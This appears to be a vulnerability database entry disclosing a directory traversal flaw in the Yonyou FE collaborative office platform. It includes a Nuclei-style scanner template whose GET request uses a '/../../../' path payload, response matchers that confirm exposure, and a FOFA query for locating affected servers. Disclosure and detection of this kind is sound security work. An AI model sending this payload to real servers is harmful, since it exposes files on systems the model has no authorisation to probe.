yonyou-fe-directory-traversal: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal

日期: 2025-08-01 | 影响软件: yonyou fe | POC: 已公开

漏洞描述

There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks.

PoC代码[已公开]

id: yonyou-fe-directory-traversal

info:
  name: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal
  author: SleepingBag945
  severity: medium
  description: |
    There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: FE协作
  tags: yonyou,fe,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "window.location=\"templateOfTaohong_manager.jsp?path=\""
          - "var next=window.confirm(\"确定删除文件吗?\");"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008bdf17838d0034c304a3c3fb295570e9fa26df6d7452ff7d83a555cd39d577b6022053800418351f392a5cf694f9e2a5e0e65d12b9740b91015a3b3e3fec84da8b80:922c64590222798bb761d5b6d8e72950

相关漏洞推荐